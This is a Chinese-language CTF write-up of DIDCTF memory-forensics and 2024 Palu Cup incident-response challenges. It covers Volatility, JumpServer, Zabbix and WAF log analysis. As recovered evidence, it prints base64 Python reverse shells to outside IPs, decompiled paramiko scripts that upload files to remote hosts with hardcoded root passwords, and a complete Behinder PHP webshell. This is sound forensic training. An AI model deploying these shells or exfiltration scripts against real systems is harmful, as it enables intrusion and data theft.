DIDCTF-内存取证与2024帕鲁杯

admin 2025年2月4日21:06:09评论13 views字数 10781阅读35分56秒阅读模式

前言

记录DIDCTF的内存取证题目。

一、内存取证

HTB-TrueSecrets

我们的网络犯罪小组已经对一个知名的APT(高级持续性威胁)组织进行了数月的调查。该组织对多个知名企业组织进行了高调的攻击。然而,该案件有趣的是,他们已经开发了他们自己的定制命令与控制服务器。幸运的是,我们的小组能够突袭该APT组织领导者的住所,并在计算机仍然通电的情况下对其进行了内存捕获。分析捕获的数据,尝试找到服务器的源代码。

首先查看cmdline,发现有一个文件:backup_development.zip

DIDCTF-内存取证与2024帕鲁杯

然后解压出来得到了development.tc

tc的文件是由TrueCrypt加密得到的,密钥通过这个来获取:

python2 vol.py --plugin=volatility2_plugin -f C:UsersAdministratorDesktop应急响应TrueSecrets.raw --profile=Win7SP1x86_23418 truecryptpassphrase
Volatility Foundation Volatility Framework 2.6
Found at 0x89ebf064 length 28: X2Hk2XbEJqWYsh8VdbSYg6WpG9g7

然后用密钥挂载这个tc文件:

DIDCTF-内存取证与2024帕鲁杯

挂载后得到:

DIDCTF-内存取证与2024帕鲁杯

sessions中是三个.log.enc文件,先打开AgentServer.cs看看:

DIDCTF-内存取证与2024帕鲁杯

关键代码拿出来了,DES加密,初始向量和密钥都给了……

看看sessions中的三个enc文件:

# 5818acbe-68f1-4176-a2f2-8c6bcb99f9fa.log.enc
wENDQtzYcL3CKv0lnnJ4hk0JYvJVBMwTj7a4Plq8h68=
M35jHmvkY9WGlWdXo0ByOJrYhHmtC8O0rZ28CviPexkfHCFTfKUQVw==
hufGZi+isAzspq9AOs+sIwqijQL53yIJa5EVcXF3QLLwXPS1AejOWfPzJZ/wHQbBAIOxsJJIcFq0+83hkFcz+Jz9HAGl8oDianTHILnUlzl1oEc30scurf41lEg+KSu/6orcZQl3Bws=
6ySb2CBt+Z1SZ4GlB7/yL4cOS/j1whoSEqkyri0dj0juRpFBc4kqLw==
U2ltlIYcyGYnuh0P+ahTMe3t9e+TYxKwU+PGm/UsltpkanmBmWym5mDDqqQ14J/VSSgCRKXn/E+DKaxmNc9PpPOG1vZndmflMUnuTUzbiIdHBUAEOWMO8wVCufhanIdN56BhtczjrJS5HRvl9NwE/FNkLGZt6HQNSgDRzrpY0mseJHjTbkal6nh226f43X3ZihIF4sdLn7l766ZksE9JDASBi7qEotE7f0yxEbStNOZ1QPDchKVFkw==

# c65939ad-5d17-43d5-9c3a-29c6a7c31a32.log.enc
wENDQtzYcL3CKv0lnnJ4hk0JYvJVBMwTj7a4Plq8h68=
M35jHmvkY9WGlWdXo0ByOJrYhHmtC8O0eu8xtbA16kKagSu6MIFSWQ==
hufGZi+isAzspq9AOs+sI0VYrJ6o8j3e9a1tNb9m1bVwJZpRxCOxg3Vs0NdU9xNxPku+sBziVYsVaOtgWkbH9691++BUkD1BNVRMc0e69lVs2cJmQIAbnagMaJ6OQEZAAvZ/G6y57CQ=
6ySb2CBt+Z1SZ4GlB7/yL8asWs1F/wTUTOLEHO92yuzuTzdsiM5t5w==
U2ltlIYcyGYnuh0P+ahTMe3t9e+TYxKwU+PGm/UsltpkanmBmWym5mDDqqQ14J/VSSgCRKXn/E+DKaxmNc9PpPOG1vZndmflMUnuTUzbiIdHBUAEOWMO8wVCufhanIdN56BhtczjrJS5HRvl9NwE/FNkLGZt6HQNSgDRzrpY0mseJHjTbkal6nh226f43X3ZihIF4sdLn7l766ZksE9JDASBi7qEotE7f0yxEbStNOZ1QPDchKVFkw==

# de008160-66e4-4d51-8264-21cbc27661fc.log.enc
wENDQtzYcL3CKv0lnnJ4hk0JYvJVBMwTj7a4Plq8h68=
M35jHmvkY9WGlWdXo0ByOJrYhHmtC8O0hn+gLHaClb4QbACeOoSiYA==
hufGZi+isAzspq9AOs+sI/u+AS/aWPrAYd+mctDo7qEt+SpW2sELvSaxx6RRdK3vDavTsziAtb4/iCZ72v3QGh78yhY2KXZFu8qAcYdN7ltOOlg1LSrdkhjgr+CWTlvWh7A8IS7NwwI=
6ySb2CBt+Z1SZ4GlB7/yL4rJGeZ0WVaYW7N15aUsDAqzIYJWL/f0yw==
U2ltlIYcyGaSmL5xmAkEop+/f5MGUEWeWjpCTe5eStd/cg9FKp89l/EksGB90Z/hLbT44/Ur/6XL9aI27v0+SzaMFsgAeamjyYTRfLQk2fQlsRPCY/vMDj0FWRCGIZyHXCVoo4AePQB93SgQtOEkTQ2oBOeVU4X5sNQo23OcM1wrFrg8x90UOk2EzOm/IbS5BR+Wms1M2dCvLytaGCTmsUmBsATEF/zkfM2aGLytnu5+72bD99j7AiSvFDCpd1aFsogNiYYSai52YKIttjvao22+uqWMM/7Dx/meQWRCCkKm6s9ag1BFUQ==
+iTzBxkIgVWgWm/oyP/Uf6+qW+A+kMTQkouTEammirkz2efek8yfrP5l+mtFS+bWA7TCjJDK2nLAdTKssL7CrHnVW8fMvc6mJR4Ismbs/d/fMDXQeiGXCA==

分别对三个文件的内容解密:

5818acbe-68f1-4176-a2f2-8c6bcb99f9fa.log.enc

DIDCTF-内存取证与2024帕鲁杯

c65939ad-5d17-43d5-9c3a-29c6a7c31a32.log.enc

DIDCTF-内存取证与2024帕鲁杯

de008160-66e4-4d51-8264-21cbc27661fc.log.enc

DIDCTF-内存取证与2024帕鲁杯
HTB{570r1ng_53cr37_1n_m3m0ry_15_n07_g00d}

二、2024帕鲁杯-应急响应

首先按照比赛官方的说明手册搭建环境。

1、帕鲁杯-1

找到JumpServer堡垒机中flag标签的值。[答案格式:AbCdEf123456]

打开堡垒机网站:http://192.168.20.11,登录进去:

随便翻找一下找到了:BrYeaVj54009rDIZzu4O

DIDCTF-内存取证与2024帕鲁杯

2、帕鲁杯-2

提交攻击者第一次登录时间。[答案格式:2023/11/08/23:02:56]

找到登录日志:

DIDCTF-内存取证与2024帕鲁杯

在里面找攻击者第一次登录时间,这个还需要点技巧。登录日志里最早的一条日志肯定是管理员登录的,那么看一下它的IP是192.168.1.4,所以这个IP应该可以排除。

再往前翻就找到了:

DIDCTF-内存取证与2024帕鲁杯

提交是正确的:2024/04/11/14:21:18

3、帕鲁杯-3

提交攻击者源IP[答案格式:127.0.0.1]

这个题有点迷……

日志中登录最多的IP是:192.168.1.4

DIDCTF-内存取证与2024帕鲁杯

4、帕鲁杯-4

提交攻击者使用的cve编号[答案格式:CVE-2023-12345 ]

这除了去网上搜也没别的办法:

DIDCTF-内存取证与2024帕鲁杯

把搜到的都提交一遍,发现答案是:CVE-2024-29201

5、帕鲁杯-5

提交攻击者留在Web服务器上的恶意程序的32位小写md5值[答案格式:e10adc3949ba59abbe56e057f20f883e]

web服务器不知道密码,首先要重置密码:

https://blog.csdn.net/the_liang/article/details/129972481

重置密码后为了方便操作,我们用终端管理软件进行远程连接,但是需要进行以下操作:

1、启用网卡:ifup ens33
2、远程连接端口是222

登进去后看到,root目录下还有个home文件,猜测有可能是攻击者上传的恶意文件:

DIDCTF-内存取证与2024帕鲁杯

扔沙箱:

DIDCTF-内存取证与2024帕鲁杯

计算其MD5值:84413332e4e7138adc5d6f1f688ddd69

6、帕鲁杯-6

分析恶意程序连接地址和密码,格式为: md5(地址)-md5(密码) 全小写

把上个题中的home文件用pyinstxtractor反编译成pyc,再去线上反编译把Pyc反编译成py:

先反编译palucomeyi1.pyc

# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information
# Version : Python 3.10

import os
import paramiko
from getpass import getpass

defsearch_in_files(directory, search_text):
pass
# WARNING: Decompyle incomplete


defssh(local_file_path, remote_file_path):
    hostname = '82.157.238.111'
    port = 22
    username = 'root'
    password = '1qaz@WSX3edc'
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(hostname, port, username, password)
    sftp = client.open_sftp()
    sftp.put(local_file_path, remote_file_path)
    sftp.close()
    client.close()
    print(f'''File {local_file_path} uploaded to {remote_file_path} on {hostname}''')

search_directory = '/'
search_for_text = 'passwod'
(a, b) = search_in_files(search_directory, search_for_text)
ssh(a, b)

连接地址:82.157.238.111,MD5:e695461c231aee4ed46b201efca18ff8

密码:1qaz@WSX3edc,MD5:7da188c2e2d83e38b7d9e75e500f1af8

7、帕鲁杯-7

提交存在反序列化漏洞的端口 [格式:端口]

这个题一开始没反应过来,只是提交端口……

那不就是web应用的端口,果断8080喽

8、帕鲁杯-8

提交攻击者使用的后门路由地址 [格式:/router/admin ]

这个谁能想到……

JumpServer的命令记录中,有一条:cat app.py

DIDCTF-内存取证与2024帕鲁杯

路由就是:/api/system

9、帕鲁杯-9

提交dnslog反弹域名 [格式:aaaa.bbbb.cn]

在WebServer的/flask/log.txt目录下,有一个log.txt文件,里面找到了:

DIDCTF-内存取证与2024帕鲁杯

提交域名0vqkht.dnslog.cn竟然不对,再往下翻一翻:

DIDCTF-内存取证与2024帕鲁杯

这个是对的:0vqkht.palu.cn

10、帕鲁杯-10

提交第一次扫描器使用时间 [格式:2023/11/05/08:27:59]

/flask/log.txt/log.txt中看到短时间内执行了大量的ls操作……这算什么扫描

DIDCTF-内存取证与2024帕鲁杯

时间:1713119219.24738

但这个是时间戳,要转成日期:2024/04/15/02:26:59

11、帕鲁杯-11

提交攻击者反弹shell使用的语言 [格式:php]

纯蒙的:python

网站就是python架构的,不是python又能是什么……

执行的命令也找到了:

DIDCTF-内存取证与2024帕鲁杯

12、帕鲁杯-12

提交攻击者反弹shell的ip [格式:127.0.0.1]

先提出来反弹shell的命令:

pcntl_exec('/usr/bin/python',['-c',base64_decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja
2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjgyLjE1Ny4yMzguMTc0Iiw3ODkwKSk7b3MuZHVwMih
zLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKQ=='

)]);

base64解码:

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("82.157.238.174",7890));
os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty;
pty.spawn("sh")

得到IP:82.157.238.174

13、帕鲁杯-13

提交攻击者留下的账号 [格式:admin]

直接cat /etc/passwd

DIDCTF-内存取证与2024帕鲁杯

palu.com

14、帕鲁杯-14

提交攻击者的后门账户密码 [格式:123456]

cat /etc/shadow

DIDCTF-内存取证与2024帕鲁杯

解密:

DIDCTF-内存取证与2024帕鲁杯

又要上特殊手断了:123123

15、帕鲁杯-15

提交测试数据条数 [格式:8]

看MySQL01虚拟机,连接它的数据库。

DIDCTF-内存取证与2024帕鲁杯

答案:5

16、帕鲁杯-16

请提交攻击者留下的信息 [格式:jdf_2ndiwa_12]

webserver中:

DIDCTF-内存取证与2024帕鲁杯

flag{hi_palu_f10g}

17、帕鲁杯-17

请提交运维服务器上的恶意文件32位小写md5

运维服务器应该指的就是JumpServer,查看其文件传输历史,发现有一个helloworld比较可疑:

DIDCTF-内存取证与2024帕鲁杯

可是去服务器上并没有找到这个文件,猜测是做了某些操作,那么看一下命令记录:

DIDCTF-内存取证与2024帕鲁杯

没看到做了移动或者命名的操作,那就搜索一下:

DIDCTF-内存取证与2024帕鲁杯

找到了,在/usr/lib/helloworld

计算其md5:0fca0f847a45401c878d7a5303ddc1f8

18、帕鲁杯-18

提交恶意文件的恶意函数 [格式:hello]

把上个题拿到的helloworld文件用IDA逆向出源代码,分析后提交:begingame

19、帕鲁杯-19

请提交攻击者恶意注册的恶意用户条数 [格式:89]

去数据库中一通找,在ultrax库中的pre_common_member表中:

DIDCTF-内存取证与2024帕鲁杯

条数:10

20、帕鲁杯-20

看waf:

DIDCTF-内存取证与2024帕鲁杯

拦截了3.6k,肯定是扫描了:2024/04/16/21:03:46

21、帕鲁杯-21

提交攻击者下载的文件 [格式:1.txt]

查看jumpserver中的文件传输记录:

DIDCTF-内存取证与2024帕鲁杯

只看下载的,总共也就两个文件:other_vhosts_access.logserver.sql.gz

提交竟然都不对……

然后在waf里找到了这个:

DIDCTF-内存取证与2024帕鲁杯

22、帕鲁杯-22

请提交攻击者第一次下载服务器文件的时间 [格式:17/Sep/2023:11:04:22]

分析apache日志:

cat /var/log/apache2/other_vhosts_access.log.1 |grep upload.zip
DIDCTF-内存取证与2024帕鲁杯

可以看到最早的时间是:16/Apr/2024:09:03:52

23、帕鲁杯-23

请提交攻击者留下的冰蝎马的文件名称 [格式:hellodidctf.php]

/var/www/html目录拖下来扔D盾:

DIDCTF-内存取证与2024帕鲁杯

打开看一下,冰蝎无疑了:

DIDCTF-内存取证与2024帕鲁杯

名称:nidewen.php

24、帕鲁杯-24

提交冰蝎的链接密码 [格式:hello]

冰蝎的代码已经找到了:

<?php
@error_reporting(0);
session_start();
$key="1be873048db838ac";
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
 $t="base64_"."decode";
 $post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
  $post[$i] = $post[$i]^$key[$i+1&15]; 
 }
}
else
{
 $post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
classC{publicfunction__invoke($p){eval($p."");}}
@call_user_func(new C(),$params);
?>

key就是:1be873048db838ac

不过这个是它的MD5,原始值是:

DIDCTF-内存取证与2024帕鲁杯

又要上特殊手段了:nidewen

25、帕鲁杯-25

提交办公区存在的恶意用户名 [格式:admin]

打开PC01,查看其用户账户:

DIDCTF-内存取证与2024帕鲁杯

恶意用户:hacker

26、帕鲁杯-26

提交恶意用户密码到期时间 [格式:2023/2/16/13:50:38]

在PC01中,执行:net user hacker

DIDCTF-内存取证与2024帕鲁杯

日期: 2024/5/28/21:40:37

27、帕鲁杯-27

请对办公区留存的镜像取证并指出内存疑似恶意进程 [格式:hack.exe]

查看进程:pslist

一眼就看到了.hack.ex

DIDCTF-内存取证与2024帕鲁杯

28、帕鲁杯-28

请指出该员工使用的公司OA平台的密码 [格式:hello123]

查看所有文件:filescan

DIDCTF-内存取证与2024帕鲁杯

找到了password.txt,导出来:

DIDCTF-内存取证与2024帕鲁杯

密码:liuling7541

29、帕鲁杯-29

攻击者传入一个木马文件并做了权限维持,请问木马文件名是什么 [格式:hello]

DIDCTF-内存取证与2024帕鲁杯

查看剪贴板发现有这个文件:h4ck3d!

30、帕鲁杯-30

请提交该计算机中记录的重要联系人的家庭住址 [格式:甘肃省兰州市安宁区水挂庄6号]

扫描所有文件发现了这个:王总.contact

DIDCTF-内存取证与2024帕鲁杯

导出来:

DIDCTF-内存取证与2024帕鲁杯

地址:秋水省雁荡市碧波区千屿山庄1号

31、帕鲁杯-31

请提交近源靶机上的恶意文件32位小写MD5

PC02开机后就蹦出来了一个文件:

DIDCTF-内存取证与2024帕鲁杯

用过CS的一看就知道这是什么,计算其MD5:a7fcd0b15a080167c4c2f05063802a6e

32、帕鲁杯-32

提交恶意程序的外联地址 [格式:127.0.0.1]

扔沙箱:

DIDCTF-内存取证与2024帕鲁杯

地址:101.78.63.44

33、帕鲁杯-33

提交攻击者使用内网扫描工具的32位小写md5

明显说的就是fscan……在WebServer中搜索:

DIDCTF-内存取证与2024帕鲁杯

计算其md5:1facdcd05c43ba4d37274dffc90b6d4e

34、帕鲁杯-34

请提交攻击者在站点上留下的后门密码 [格式:hello]

查看waf的防护日志:

DIDCTF-内存取证与2024帕鲁杯

密码都是123

35、帕鲁杯-35

请提交攻击者在数据库留下的信息 [格式:flag{hello} ]

连接MySQL01的数据库,在库ultrax中的pre_ucenter_vars表中看到了:

DIDCTF-内存取证与2024帕鲁杯

flag{hack_palu}

36、帕鲁杯-36

提交攻击者在监控服务器上留下的dcnlog地址 [格式:123.baidu.com]

……监控服务器指的是zabbix,访问网站:http://192.168.20.12/zabbix

登录后台,默认的账号密码:admin/zabbix

管理 ->脚本中找到了执行的命令:ping user.python3.palu.dcnlog.cn

DIDCTF-内存取证与2024帕鲁杯

地址:palu.dcnlog.cn

37、帕鲁杯-37

提交监控服务器上恶意用户的上一次登录时间 [格式:2023/04/18/09:38:24]

zabbix的管理->用户界面:

DIDCTF-内存取证与2024帕鲁杯

时间:2024/04/17/01:32:44

38、帕鲁杯-38

提交监控服务器上遗留的反弹shell地址和端口 [格式:127.0.0.1:8080]

脚本页面找到了一串编码:

DIDCTF-内存取证与2024帕鲁杯

提取出来解码看看:

# aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE1NC4xODMuMTEwLjEyIiw3ODkwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKQ
->
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("154.183.110.12",7890));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty; pty.spawn("sh")

地址和端口:154.183.110.12:7890

39、帕鲁杯-39

提交恶意钓鱼文件的32位小写md5

在PC02上:

DIDCTF-内存取证与2024帕鲁杯

计算其MD5:da75025ff7f3b6baa27f5913c1c83063

40、帕鲁杯-40

提交恶意文件外连IP [格式:127.0.0.1]

41、帕鲁杯-41

提交被恶意文件钓鱼使用者的姓名 [格式:菜虚鲲]

DIDCTF-内存取证与2024帕鲁杯

姓名:陈琚鹭

42、帕鲁杯-42

提交攻击者留下的信息 [格式:flag{hello-didctf} ]

打开注册表直接就是这个页面:

DIDCTF-内存取证与2024帕鲁杯

flag{2024-04-17-hi}

43、帕鲁杯-43

提交恶意用户数量 [格式:20]

查看用户列表:

DIDCTF-内存取证与2024帕鲁杯

数了一下admin00-admin19,然后dev00-dev19sale00-sale08,共49个。

44、帕鲁杯-44

请提交员工集体使用的密码 [格式:Admin123]

用户目录下有个111.ps1文件:

DIDCTF-内存取证与2024帕鲁杯

45、帕鲁杯-45

提交加密文件的32位小写md5

最近使用的文件中就有:

DIDCTF-内存取证与2024帕鲁杯

计算其MD5:2bf71a0d6d4e70cec7602da2b653e2ab

46、帕鲁杯-46

提交被攻击者加密的内容明文 [格式:hello123]

扔随波逐流:

DIDCTF-内存取证与2024帕鲁杯

明文:2024ispassword

47、帕鲁杯-47

请提交符合基线标准的服务器数量 [格式:49]

基线标准要求项很多的,几乎就没有符合的,直接猜0台,对了。

48、帕鲁杯-48

提交办公区的恶意文件的32位小写md5

在jumpserver中找上传的记录,再找出来往办公区上传的,经过筛选就是:artifact.exegeek.exepalucomeyi1.exe【通知】……这几个

DIDCTF-内存取证与2024帕鲁杯

分别分析发现是palucomeyi1.exe

DIDCTF-内存取证与2024帕鲁杯

MD5是:5232a191eb2913337e0a93b0a990f2a2

49、帕鲁杯-49

提交恶意回连端口 [格式:3389]

python封装的exe,用pyinstxtractor.py反编译出pyc,再把pyc反编译成py:

#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.8

import os
import paramiko
from getpass import getpass

defsearch_in_files(directory, search_text):
pass
# WARNING: Decompyle incomplete


defssh(local_file_path, remote_file_path):
    hostname = '192.168.20.123'
    port = 22
    username = 'root'
    password = 'Network@2020'
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(hostname, port, username, password)
    sftp = client.open_sftp()
    sftp.put(local_file_path, remote_file_path)
    sftp.close()
    client.close()
    print(f'''File {local_file_path} uploaded to {remote_file_path} on {hostname}''')
    flag = 'flag{234567uyhgn_aiduyai}'

search_directory = '/'
search_for_text = 'passwod'
(a, b) = search_in_files(search_directory, search_for_text)
ssh(a, b)

端口:22

50、帕鲁杯-50

提交恶意程序中的flag

上个题反编译的源码里:flag{234567uyhgn_aiduyai}

51、帕鲁杯-51

提交恶意文件中的search_for_text内容

第49题中的源码:passwod

52、帕鲁杯-52

提交web服务器上攻击者修改后的root密码

原文始发于微信公众号(南有禾木):DIDCTF-内存取证与2024帕鲁杯

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月4日21:06:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DIDCTF-内存取证与2024帕鲁杯https://cn-sec.com/archives/3698072.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息